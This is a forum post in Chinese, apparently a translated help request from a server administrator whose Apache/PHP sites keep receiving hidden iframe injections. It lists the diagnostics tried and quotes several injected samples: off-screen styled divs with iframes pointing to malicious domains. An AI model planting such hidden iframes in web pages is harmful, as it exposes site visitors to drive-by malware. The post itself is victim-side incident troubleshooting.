几个月前,隐藏的 iFrame 开始出现在我们专用服务器上每个站点的每个页面上。当我们使用 503 将站点停机进行维护时,iFrame 仍然在停机维护页面上。最终,宿主封锁了 iFrame 的来源,但我们始终没有找到后门。注入的 iFrame 看起来像这样,但包裹在一个样式标签中以进行混淆,并带有各种 URL:
iframe src="http://heusnsy.nl/32283947.html..
我们将较小的站点移到了不同的主机上,它们都很好。
我们将主站点移动到同一主机上的新专用服务器上,尽管我们努力锁定服务器 - 防火墙、限制访问、软件更新、检查每个文件 - iFrame 还是返回了。
我们到处寻找它是如何进入的 - 配置文件,htaccess - 但找不到它。
知道隐藏的 iFrame 注入漏洞可能在哪里吗?
编辑:这里有更多细节:运行 Apache 和 PHP 的 Linux 机器。一切的最新版本。注入的代码如下所示:
<style>.ivx4di91j1 { position:absolute; left:-1418px; top:-1348px} </style> <div class="ivx4di91j1"><iframe src="heusnsy.nl/32283947.html..
更新:这里有更多信息和我们学到的东西:
主机:Station CentOS Linux 6.3 - x86_64 上的 Linux 2.6.32-279.5.1.el6.x86_64 / Apache 版本 2.2.15 - PHP 5.3.3 (cli)(构建时间:2012 年 7 月 3 日 16:53:21)
服务器本身没有受到损害。
包括 (apache/php) 在内的所有服务都升级到我们系统可用的最新版本。
没有帐户(ftp 或其他)受到损害。
恶意软件在多个受感染站点上同时更改其目标 URL (iframe src=)。(由 unmaskparasites.com 提供)
在更改 src 目标期间,没有执行/运行任何流氓或隐藏进程。
TCPDUMP 在离开端口 80 tcp 时获取了恶意软件的代码,但在接收恶意软件的用户的 GET 请求中没有发现任何奇怪的东西——在相应的 apache 访问日志中也没有发现任何奇怪的东西。
在 iFrame 的 src url 地址切换期间,网站文件或 httpd/php 二进制文件没有以任何方式更改 - 由 md5sum 检查提供。
在更改期间,未在已知端口上为已知服务建立恶意连接。防火墙负责其余的工作。
rkhunter 和 maldet 没有结果。
"</script>"恶意软件 iFrame在任何具有此标签的页面上的第一个标签之后被触发并注入,在此服务器上的所有帐户和网站上。恶意软件被注入到静态页面和没有数据库连接的站点上。
<head> </script></head>(页面有标签就足够了)没有安装流氓 apache 模块或 php 模块(不包括 mycript.so)。大多数默认的 apache 模块都被挂起并被注释掉。
恶意软件并非一直存在。它来来去去,有时会关闭几个小时,然后出现几个用户并再次熄灭。使其非常难以追踪。
我们网站上运行的 100% 的 php 代码和大多数 javascript 代码(除了 phpmyadmin 之外)是自定义编码的。唯一不是 Jquery 库。
服务器是高流量机器,在日志中搜索/匹配非常慢。每周访问日志可能会超过 15GB。
情况就是这样……这不再是被盗帐户、被黑文件、流氓脚本的问题。这是迄今为止我们所见过的任何事情,原因隐藏在 apache/php 本身的某个地方。(至少这是我们的想法)。非常感谢任何帮助或想法。
以下是 iFrame 注入的示例:
<script src="/templates/js/jquery-1.4.2.min.js" type="text/javascript"></script><style>.pw0xxs { position:absolute; left:-1795px; top:-1357px} </ style> <div class="pw0xxs"><iframe src="http://infectedsite.com/84064443.html" width="167" height="332"></iframe></div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" type="text/javascript"></script><style>.h3fuonj6 { position:absolute; left :-1012px; top:-1348px} </style> <div class="h3fuonj6"><iframe src="http://infectedsite.com/13334443.html" width="236" height="564"></iframe></div >
</script><style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://infectedsite.com/79144443.html" wid th="559" height="135"></iframe></div>
document.write('<style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://ksner.pl/79144443.ht ml" width="559" height="135"></iframe></div>');// ColorBox v1.3.19.3 - jQuery lightbox plugin
</script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443. html" width="163" height="409"></iframe></div>
<script src="./js/cross_framing_protection.js?ts=1344391602" type="text/javascript"></script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443.html" width="163" height="409"></iframe></div>